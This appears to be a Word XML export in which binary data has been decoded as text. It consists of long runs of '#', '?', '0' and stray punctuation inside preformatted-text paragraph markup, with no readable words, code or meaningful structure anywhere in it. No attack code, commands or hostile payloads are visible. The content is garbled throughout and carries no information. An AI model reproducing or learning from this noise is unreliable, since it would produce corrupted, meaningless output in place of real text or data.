#0#######?6B############?############??F##########?######0#######?###?##########?####0#######??G##########?#?####0#######??G##########?#?####0#######?###?##########?@###0#######?###?##########?#0#0####################?#?@###0#######?###?##########?#0#0####################?#?@###0#######?###?########?#?#0#0####################?#?@###0#######?###?########?#?#0#0####################?#?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?##########?@###0#######?###?########?#?#0#0##################?#?#?####0#######?###?########?#?############?###?###P######?####0#######?###?##########?############?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?### ########?###?###P######?####0#######?###?##########?#0######################?############################################################# ###!###&amp;###-###.###3###A###B###I###\###]###d###r###s###z###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###g###o###?###?###?###########&amp;###=###&gt;###F###?###?###?###########/###z###?###?###?#######"###(###Z###?###?###?###?###?###?###?###?###E###?###?###?###?###?####</w:t>
        <w:tab/>
        <w:t>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!</w:t>
        <w:tab/>
        <w:t>##'</w:t>
        <w:tab/>
        <w:t>##-</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##5</w:t>
        <w:tab/>
        <w:t>##8</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##D</w:t>
        <w:tab/>
        <w:t>##J</w:t>
        <w:tab/>
        <w:t>##P</w:t>
        <w:tab/>
        <w:t>##V</w:t>
        <w:tab/>
        <w:t>##W</w:t>
        <w:tab/>
        <w:t>##Z</w:t>
        <w:tab/>
        <w:t>##a</w:t>
        <w:tab/>
        <w:t>##f</w:t>
        <w:tab/>
        <w:t>##l</w:t>
        <w:tab/>
        <w:t>##r</w:t>
        <w:tab/>
        <w:t>##y</w:t>
        <w:tab/>
        <w:t>##z</w:t>
        <w:tab/>
        <w:t>##~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br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##&amp;###R###~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####?###?#######################################+###,###.###0###2###4###@###G###J###L###O###R###S###U###^###_###`###?###?###?###?###C###^###h###i###q###x###|###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###############################%###3###4###B###C###P###Q###R###X###f###g###u###v###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?####################### ###$###(###)###,###3###9###?###E###L###M###P###W###\###b###h###n###o###r###y###~###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?#######;###O###P###p###?###%###?###?###?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&amp;###,###/###;###G###H###J###Q###U###a###m###n###p###w###{###?###?###?###?###?###?###?#######?###?###?#######7###@###?###?###?###"###@###I###?###?###?###+###J###S###?###?###?###########-###&gt;###O###b###c###l###t###?###?###?###?###?###?###?###</w:t>
        <w:tab/>
        <w:t>#######,###@###I###J###N###O###P###[######?###?###?###?#######0###M###j###k###q###?###?###?###?###?###?###?###E###g###?#######?###? ##? ##5!##7!##8!##D!##X!##?!##?!##?!##S"##?"##?"######B####$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$###%###%##</w:t>
        <w:br/>
        <w:t>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%###%###%###%###%###%###%###%###%##t%##?%###&amp;##?&amp;##?&amp;##?&amp;###'##W'##?'##?'##</w:t>
        <w:tab/>
        <w:t>(##O(##P(##w(##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>)###)###)##,)##3)##7)##;)##?)##C)##G)##H)##M)##Q)##U)##Y)##])##b)##c)##i)##l)##o)##r)##u)##x)##y)##?)##?*##h+##?+##?+##?+## ,##',##+,##/,##3,##7,##;,##&lt;,##A,##G,##M,##S,##Y,##_,##`,##f,##g,##k,##o,##s,##w,##x,##y,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,###-###-###-##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-###-###-###-###-###-##!-##$-##.-##/-##8-##9-##K-##o-##v-##z-##~-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-###.##_.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.###/###/###/###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/###/###/###/###/###/###/##"/###/##)/##-/##./##2/##3/##?/##?/##?/###0##N0##|0##}0##?0##?0##?0##'1###?###?########?#?####0#######?###?######## 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&lt;####?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?############?###?########?#?####0#######?###?########?#?############?###?########?######0#######?###?########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?#?####0#######??</w:t>
        <w:br/>
        <w:t>##########?######0#######?###?####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########?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########?#?#####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#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 #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## 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 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 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 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 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 #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## 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 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 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 #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## 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 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 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 #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## 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 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 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 #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## 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 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 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 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 #?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########## 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 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&lt;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?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##?####0#######?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#################0#######?###?##########?####0#######??#############?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??###########?#?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??###########?#?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??###########?#?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??########### #?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?#</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> #0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?#</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> #0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?######0#######?###?#####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??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??########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??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??########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??###########?#?############??###########?#?############??###########?#?############??###########?#?############??###########?#?############??###########?#?############??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??########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??###########?#?############??###########?#?############??###########?#?############??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??##################0#######?###?##########?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?############?8!############?############?8!############?############?8!############?############?8!############?####0#######?8!############?############?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?############?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!##########?#?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!##########?#?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!########## #?####0#######?8!##########?######0#######?###?##########?####0#######?y)############?####0#######?y)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?y)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?y)############?####0#######?y)############?@###0#######?y)############?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)##########?#?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)##########?#?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)##########?#?####0#######?y)############?####0#######?y)############?####0#######?y)############?####0#######?y)############?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)##########?#?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)############?####0#######?y)########## #?####0#######?y)##########?#?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)############?####0#######?y)########## #?####0#######?y)##########?#?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)############?####0#######?y)########## #?####0#######?y)##########?#?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)############?####0#######?y)########## #?####0#######?y)##########?#?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)############?####0#######?y)########## #?####0#######?y)##########?#?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)########## #?####0#######?y)############?####0#######?y)########## #?####0#######?y)##########?#?@###0#######?y)############?@###0#######?y)############?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)##########?#?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)##########?#?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)########## #?@###0#######?y)##########?#?####0#######?y)##########?#?####0#######?y)##########?#?####0#######?y)##########?######0#######?###?########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?############??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.########## #?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.#####?####?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.#####?####?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.#####L####?#?############??.##########?#?############??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?####0#######??.##########?#?############??.##########?#?############??.##########?#?############??.##########?#?############??.##########?#?############??.##########?#?############??.##########?#?####0#######??.##########?#?####0#######??.##########?#?## #0#######??.##########?#?############??.##########?#?## #0#######??.##########?#?############??.##########?#?## #0#######??.##########?#?############??.##########?#?############??.##########?#?####0#######??.##########?#?####0#######??.##########?######0#######?###?########?#?####0#######??9##########?#?############??9##########?#?####0#######??9##########?#?####0#######??9##########?#?####0#######??9##########?#?####0#######??9##########?######0#######?###?########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?#?####0#######?j;##########?######0#######?###?########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?############???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???#####?######?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?## #0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???##########?#?####0#######???########## #?## #0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?## #0</w:t>
        <w:tab/>
        <w:t>######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?## #0</w:t>
        <w:br/>
        <w:t>######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?## #0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?## 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??########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?####0#######???########## #?## #0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>######???########## #?@###0#######?###?######## #?@###0#######?###?######## #?@###0#######?###?######## #?@###0#######?###?######## #?@###0#######?###?######## #?@###0#######?###?######## #?@###0#######?###?######## #?@###0#######?###?######## #?@###0#######?###?######## #?@# #0#######?###?########?#?@# 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(@# #0#######?###?########?#?@###0#######?############?#(@# #0#######?###?########?#?@###0#######?T###########?#(@# #0#######?###?########?#?@###0#######?6###########?#(@# #0#######?###?########?#?@###0#######?############?#?####0#######?###?#######?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##[###m###m###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###o###r#######\</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##.###N###?###?###(###?###F###?####!##x"##"&amp;##?&amp;##?(##N+##~,##?.##T5##47###9##?;##?=##??##vA##?G##??##X###6#######?###?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>######? ##?)##Z,##?,##F-##?-##?.##2/##?/###1##?7##b&lt;##0=##(###2###4###6###7###9###:###=###G###H###I###J###K###M###O###P###[###`###i###n###o###q###r###t###u###w###y###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?#######Z###?###?###?####</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##H</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##?###?### ###(###h###?###?###?#######B###?###?###f###d&amp;##?(##</w:t>
        <w:br/>
        <w:t>)##V)##?)##?)## *##J*##?*##?*###+##r+###,##P,##X,##?,##?,##?,##"-##D-##r-##?-##?.##F4##?4##?4##&amp;5##46##?=###@##?B##?L##??##??###?## ?##8?##(?##?###?###?###?###v###?###?###?###r###?###?#######8###p####</w:t>
        <w:tab/>
        <w:t>##&gt;</w:t>
        <w:tab/>
        <w:t>##d</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>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?+##D,##?,##2-##?-##</w:t>
        <w:br/>
        <w:t>.##|.##?.##./##r/##?/##f5##F&lt;##?&lt;##0=##)###+###,###-###.###/###0###1###3###5###8###;###&lt;###&gt;###?###@###A###B###C###D###E###F###L###N###Q###R###S###T###U###V###W###X###Y###Z###\###]###^###_###a###b###c###d###e###f###g###h###j###k###l###m###p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~###|###????????###?#####s###v###x###z###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?#######.=##*#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"###$###2###N###P###^###z###|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?###########C###Z###\###?G###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#%????#%????#%????#%????#%????#%????#%????#%????#%????#%????#%????#%????#%????#%????#%??????#:????#:????N###U###W###^###e###g###r####!????#!????###?#######?############&gt;###########?###_##??###b##?$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z??#M?^?=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???####b##?$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?S@we?#Y????#?'######C?######R##?$#####</w:t>
        <w:br/>
        <w:t>#?0"????b7Z?&gt;?l?#h#######??######b##?$#####??#?#?6&amp;##:W=?#?#X?######K#######R##?$#####?:w??M-o???L#)?k?#?2######?#######@##?####??####?#???#?#######?#?#####?####&amp;###&gt;######???#####?(#####</w:t>
        <w:tab/>
        <w:t>?######################</w:t>
        <w:br/>
        <w:t>?###############?###?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##?##?b####?#?##A#####?r#####</w:t>
        <w:br/>
        <w:t>#####?P##?#####?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
